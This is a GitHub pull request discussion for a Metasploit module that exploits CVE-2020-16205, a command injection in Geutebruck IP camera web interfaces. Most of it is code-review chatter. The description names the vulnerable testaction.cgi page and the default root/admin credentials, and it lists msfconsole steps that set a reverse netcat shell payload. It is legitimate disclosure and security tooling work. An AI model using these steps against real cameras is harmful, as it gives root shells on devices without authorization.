-
Notifications
You must be signed in to change notification settings - Fork 13.8k
New issue
Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.
By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.
Already on GitHub? Sign in to your account
Add CVE-2020-16205 exploit for Geutebruck G-CAM #13986
Conversation
Thanks for your pull request! Before this can be merged, we need the following documentation for your module: |
Removing documentation tag for now, however the documentation will need updating from my quick look over it as it does not completely follow the expected standards. Shouldn't be too hard to fix it up though, thanks for adding this in @ddouhine! |
Thanks for your pull request! Before this pull request can be merged, it must pass the checks of our automated linting tools. We use Rubocop and msftidy to ensure the quality of our code. This can be ran from the root directory of Metasploit:
You can automate most of these changes with the
Please update your branch after these have been made, and reach out if you have any problems. |
Please also run |
thx @gwillcox-r7 and @bcoles for reviewing this PR and for your help 👍 |
Np, here to help :) |
@ddouhine Reviewed the PCAP that you sent to the msfdev email account and it appears to be good, can see no errors with what you have sent there and everything matches what was shown in the module overview. Happy to consider this module as tested based on this info. I will likely be making some more comments shortly for some issues that I can't fix myself, then will be applying some fixes to your code to fix up some of the issues that @bcoles mentioned as well as some other issues r.e spelling and grammar that I noticed whilst reviewing this PR. |
it should be better now :)
or now... (forgot the msftidy_docs just before)
Co-authored-by: bcoles <bcoles@gmail.com>
Co-authored-by: bcoles <bcoles@gmail.com>
Co-authored-by: bcoles <bcoles@gmail.com>
Fixed rubocop offenses / msftidy warnings and added @bcoles enhancements.
e84b29b
to
959689d
Compare
@ddouhine Just realized your branch is way behind the latest updates for Metasploit, so the last update just rebased your branch against |
…on vulnerability with no chance of crashing the host
documentation/modules/exploit/linux/http/geutebruck_testaction_exec.md
Outdated
Show resolved
Hide resolved
… Also applied updates to make the markdown have bullet points so it displays better. Finally modified up the module description to explain the actual issue a bit more, but it might still need work
…sh and to also include the actual versions of the products that were affected in addition to the firmware versions. This prevents people from having to read the documentation to find affected targets
…to add in missing information about affected parameters
@ddouhine Alright should just be two more things to complete before we can test this out: the documentation as mentioned above, and then the improvements to the version check so that it uses |
with the updated check using `Gem::Version`
Improvements implemented in the version check @gwillcox-r7 ! And I've updated the documentation with the device name device edition firmware version. Nothing to add for me on the documentation, seems complete to me. |
@ddouhine Gah so close man, but unfortunately with your new Otherwise the new |
Oops sorry, don't know what this "return true" was doing there.
Check seems ok. With 1.12.0.27 (not vulnerable):
With 1.12.14.5 (vulnerable):
|
Code fix is still incorrect, I'll rewrite this so long. Give me a sec. |
Really ?? Feel so dumb... Well thx for your help in advance |
Don't feel bad, happens to all of us sometimes 👍 I think you'll get it pretty quick after I push the patch up. Edit: Actually the real issue was something else entirely. I'll explain after I patch this up. Sorry for the confusion 😓 |
… status if the connection fails
Ok so last commit should alter the logic a bit so that your |
Last thing that may be helpful for this exploit is to include the AutoCheck mixin which will ensure that the exploit only attempts to trigger the bug if the target is determined to be vulnerable via the I'll add this in so long, should give this a little more flexibility and assurance for pentesters 😄 |
…e attempting to exploit them.
Hmm now check is not working for me :/
I should be tired. Will have a look later. |
@ddouhine Gah that was my bad. I messed that up, will fix it now. |
…s I tried calling the nonexistant method .true?
Ok that should fix it. Sorry I was trying to simplify the logic by calling something similar to |
And a fix for the fix ;) I guess now everything will work as intended !
@ddouhine Whoops sorry, good spot! |
Do you need anything else from me ? |
@ddouhine I think there is one minor thing with the documentation but otherwise this is good to land. Let me fix that up so long and get this landed into the framework 👍 |
…ame and password could be something other than root/admin
@ddouhine Merged, thanks a ton for your patience on the edits and for submitting this PR! |
Original Release Notes |
Release NotesNew module |
@ddouhine ,If you still have pcap for this scenario ,Can you pls share it |
This exploit a simple OS command injection (CVE-2020-16205) in the web interface of the Geutebruck G-Cam and G-Code products.
Many brands use the same firmware:
Unfortunately I haven't been able to test this module against any of them except Geutebruck.
Here is the advisory: https://us-cert.cisa.gov/ics/advisories/icsa-20-219-03 and a blogpost about the issue: https://www.randorisec.fr/s05e01-rce-on-geutebruck-ip-cameras/
A web server runs on the product to offer video streaming and configuration management and the web interface have an OS command injection vulnerability in the
/uapi-cgi/admin/testaction.cgi
page used for the TCP/IP configuration.The setup pages need authentication to be reached but so its not a CVSS 10 but the credentials are not randomized (root/admin by default).
When exploited the vulnerability gives you a root access.
The following firmware are vulnerable:
I've tested it with the 1.12.14.5 firmware only and I've provided you the PCAP by mail.
ps: it's my first module since many years so I guess a few things will be incorrect/missing.
Verification
msfconsole
use exploit/linux/http/geutebruck_testaction_exec
set httpusername root
set httppassword admin
set lhost 192.168.14.1
set rhosts 192.168.14.58
set payload cmd/unix/reverse_netcat_gaping
check
exploit
Demonstration
check against a vulnerable target (1.12.14.5):
![Screenshot 2020-08-12 at 10 54 34](https://user-images.githubusercontent.com/4519330/89995808-4e91d880-dc8a-11ea-8422-9d8448194601.png)
check against a non vulnerable target (1.12.0.27):
![Screenshot 2020-08-12 at 10 54 44](https://user-images.githubusercontent.com/4519330/89997983-38d1e280-dc8d-11ea-9ed2-c806b7057083.png)
exploitation: